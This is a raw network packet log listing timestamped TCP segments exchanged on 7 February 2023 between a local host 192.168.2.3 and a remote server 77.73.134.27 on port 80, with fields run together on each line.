                                                                                    Feb 7, 2023 19:44:50.815237045 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.815263987 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.815291882 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.815296888 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.815320969 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.815325022 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.815356970 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.815378904 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.815398932 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.815416098 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.815428972 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.815458059 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.815465927 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.815488100 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.815491915 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.815515995 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.815535069 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.815546989 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.815563917 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.815593958 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.815628052 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.815654993 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.815673113 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.815682888 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.815699100 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.815721989 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.815737963 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.815751076 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.815782070 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.815792084 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.815807104 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.815820932 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.815840006 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.815850973 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.815871000 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.815880060 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.815907955 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.815927029 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.815936089 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.815959930 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.815973043 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.815999031 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.816008091 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.816037893 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.816042900 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.816066980 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.816072941 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.816096067 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.816097975 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.816124916 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.816124916 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.816147089 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.816155910 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.816171885 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.816185951 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.816204071 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.816219091 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.816242933 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.816246986 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.816267014 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.816277027 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.816302061 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.816318035 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.816323042 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.816356897 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.816369057 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.816385984 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.816397905 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.816414118 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.816442966 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.816445112 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.816472054 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.816479921 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.816500902 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.816503048 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.816528082 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.816530943 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.816554070 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.816576958 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.831316948 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.831386089 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.833700895 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.833770037 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.838865042 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.838932037 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.839001894 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.839063883 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.839144945 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.839173079 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.839204073 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.839235067 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.839236021 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.839251995 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.839262009 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.839267969 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.839296103 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.839299917 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.839329004 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.839354992 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.839364052 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.839380980 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.839405060 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.839409113 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.839438915 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.839468002 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.839494944 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.839504004 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.839504004 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.839504004 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.839523077 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.839535952 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.839554071 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.839570045 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.839581966 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.839596987 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.839607954 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.839612007 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.839641094 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.839642048 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.839672089 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.839672089 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.839699984 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.839704037 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.839730024 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.839731932 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.839761019 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.839765072 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.839791059 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.839818954 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.839828014 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.839828014 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.839842081 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.839848042 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.839865923 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.839879036 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.839899063 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.839907885 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.839930058 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.839937925 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.839953899 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.839967012 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.839987993 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.839997053 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.840020895 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.840027094 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.840049028 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.840059996 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.840085983 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.840090036 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.840111017 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.840123892 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.840142012 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.840153933 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.840176105 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.840183973 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.840204954 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.840214968 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.840234995 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.840255022 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.840274096 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.840285063 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.840306044 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.840316057 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.840334892 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.840346098 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.840367079 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.840375900 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.840398073 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.840404987 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.840430975 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.840435982 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.840456009 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.840466976 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.840487003 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.840497017 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.840517044 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.840527058 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.840543985 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.840559006 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.840581894 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.840588093 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.840614080 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.840620995 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.840640068 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.840651035 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.840672016 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.840681076 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.840704918 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.840711117 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.840733051 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.840744019 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.840774059 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.840774059 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.840804100 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.840814114 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.840833902 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.840848923 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.840861082 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.840876102 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.840904951 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.840922117 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.840934992 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.840945005 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.840965986 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.840970039 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.840995073 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.840996027 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.841018915 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.841025114 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.841047049 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.841056108 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.841080904 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.841085911 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.841114998 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.841114998 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.841130972 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.841145039 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.841160059 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.841176033 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.841193914 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.841207981 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.841228962 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.841240883 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.841259003 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.841272116 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.841286898 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.841300964 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.841317892 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.841330051 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.841346025 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.841358900 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.841377974 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.841387987 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.841407061 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.841418982 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.841435909 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.841448069 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.841465950 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.841478109 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.841494083 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.841507912 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.841526985 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.841543913 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.841573000 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.841573954 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.841590881 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.841603041 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.841631889 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.841634035 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.841655016 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.841664076 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.841689110 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.841692924 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.841711998 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.841722012 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.841739893 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.841752052 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.841769934 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.841789961 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.841799021 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.841819048 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.841846943 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.841849089 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.841872931 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.841876984 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.841896057 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.841907024 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.841923952 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.841938019 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.841953993 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.841973066 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.842000961 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.842035055 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.842037916 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.842072010 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.842097998 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.842099905 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.842137098 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.842153072 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.842166901 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.842195988 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.842204094 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.842225075 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.842246056 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.842258930 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.842288017 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.842294931 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.842318058 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.842325926 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.842348099 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.842351913 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.842375994 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.842376947 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.842401028 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.842406988 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.842428923 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.842436075 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.842452049 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.842467070 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.842482090 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.842495918 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.842523098 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.842525959 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.842555046 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.842556953 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.842581034 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.842583895 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.842602968 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.842624903 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.842633963 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.842653036 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.842680931 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.842686892 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.842724085 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.842726946 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.842752934 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.842756033 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.842782974 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.842782974 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.842811108 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.842813015 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.842842102 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.842844009 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.842869997 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.842875004 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.842885971 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.842899084 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.842927933 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.842928886 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.842955112 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.842957020 CET804969877.73.134.27192.168.2.3
                                                                                    Feb 7, 2023 19:44:50.842986107 CET4969880192.168.2.377.73.134.27
                                                                                    Feb 7, 2023 19:44:50.842987061 CET804969877.73.134.27192.168.2.3
